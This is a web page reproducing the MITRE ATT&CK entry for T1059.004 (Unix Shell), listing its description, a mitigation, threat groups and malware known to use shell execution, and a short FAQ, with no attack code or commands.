Description
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.
Reverse Shell Cheatsheet
Read our in-depth pentesting guide related to this technique
Platforms
Mitigations (1)
Execution PreventionM1038
Use application control where appropriate. On ESXi hosts, the execInstalledOnly feature prevents binaries from being run unless they have been packaged and signed as part of a vSphere installation bundle (VIB).(Citation: Google Cloud Threat Intelligence ESXi Hardening 2023)
Threat Groups (10)
| ID | Group | Context |
|---|---|---|
| G0143 | Aquatic Panda | [Aquatic Panda](https://attack.mitre.org/groups/G0143) used malicious shell scripts in Linux environments following access via SSH to install Linux ve... |
| G0139 | TeamTNT | [TeamTNT](https://attack.mitre.org/groups/G0139) has used shell scripts for execution.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligen... |
| G1052 | Contagious Interview | [Contagious Interview](https://attack.mitre.org/groups/G1052) has targeted macOS victim hosts using a bash downloader coremedia.sh and a bash script c... |
| G0106 | Rocke | [Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining... |
| G1047 | Velvet Ant | [Velvet Ant](https://attack.mitre.org/groups/G1047) used a custom tool, VELVETSTING, to parse encoded inbound commands to compromised F5 BIG-IP device... |
| G1015 | Scattered Spider | [Scattered Spider](https://attack.mitre.org/groups/G1015) has used the command shell to upload and install the Teleport remote access tool to a compro... |
| G1017 | Volt Typhoon | [Volt Typhoon](https://attack.mitre.org/groups/G1017) has used Brightmetricagent.exe which contains a command- line interface (CLI) library that can l... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) used Linux shell commands for system survey and information gathering prior to exploitation of vulnerab... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used a bash script to install malicious vSphere Installation Bundles (VIBs).(Citation: Google Cl... |
| G1041 | Sea Turtle | [Sea Turtle](https://attack.mitre.org/groups/G1041) used shell scripts for post-exploitation execution in victim environments.(Citation: PWC Sea Turtl... |
Associated Software (47)
| ID | Name | Type | Context |
|---|---|---|---|
| S1184 | BOLDMOVE | Malware | [BOLDMOVE](https://attack.mitre.org/software/S1184) is capable of spawning a remote command shell.(Citation: Google Cloud BOLDMOVE 2023) |
| S1224 | CASTLETAP | Malware | [CASTLETAP](https://attack.mitre.org/software/S1224) has the ability to spawn BusyBox command shell in victim environments.(Citation: Mandiant Fortine... |
| S0377 | Ebury | Malware | [Ebury](https://attack.mitre.org/software/S0377) can use the commands `Xcsh` or `Xcls` to open a shell with [Ebury](https://attack.mitre.org/software/... |
| S1107 | NKAbuse | Malware | [NKAbuse](https://attack.mitre.org/software/S1107) is initially installed and executed through an initial shell script.(Citation: NKAbuse SL) |
| S1163 | SnappyTCP | Malware | [SnappyTCP](https://attack.mitre.org/software/S1163) creates the reverse shell using a pthread spawning a bash shell.(Citation: PWC Sea Turtle 2023) |
| S0647 | Turian | Malware | [Turian](https://attack.mitre.org/software/S0647) has the ability to use <code>/bin/sh</code> to execute commands.(Citation: ESET BackdoorDiplomacy Ju... |
| S0482 | Bundlore | Malware | [Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper... |
| S0587 | Penquin | Malware | [Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020) |
| S0599 | Kinsing | Malware | [Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing A... |
| S0641 | Kobalos | Malware | [Kobalos](https://attack.mitre.org/software/S0641) can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.(Citation: ESE... |
| S0021 | Derusbi | Malware | [Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citatio... |
| S1108 | PULSECHECK | Malware | [PULSECHECK](https://attack.mitre.org/software/S1108) can use Unix shell script for command execution.(Citation: Mandiant Pulse Secure Zero-Day April ... |
| S0220 | Chaos | Malware | [Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor) |
| S1105 | COATHANGER | Malware | [COATHANGER](https://attack.mitre.org/software/S1105) provides a BusyBox reverse shell for command and control.(Citation: NCSC-NL COATHANGER Feb 2024) |
| S0502 | Drovorub | Malware | [Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August ... |
| S0352 | OSX_OCEANLOTUS.D | Malware | [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses a shell script as the main executable inside an app bundle and drops an embedded base... |
| S0504 | Anchor | Malware | [Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020) |
| S0451 | LoudMiner | Malware | [LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation... |
| S9008 | Shai-Hulud | Malware | [Shai-Hulud](https://attack.mitre.org/software/S9008) has utilized Linux shell commands to modify configuration files.(Citation: Socket Shai-Hulud Nov... |
| S0584 | AppleJeus | Malware | [AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Cit... |
Related CWE Weaknesses
References
- Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.
- die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.
Frequently Asked Questions
What is T1059.004 (Unix Shell)?
T1059.004 is a MITRE ATT&CK technique named 'Unix Shell'. It belongs to the Execution tactic(s). Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g....
How can T1059.004 be detected?
Detection of T1059.004 (Unix Shell) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1059.004?
There are 1 documented mitigations for T1059.004. Key mitigations include: Execution Prevention.
Which threat groups use T1059.004?
Known threat groups using T1059.004 include: Aquatic Panda, TeamTNT, Contagious Interview, Rocke, Velvet Ant, Scattered Spider, Volt Typhoon, APT41.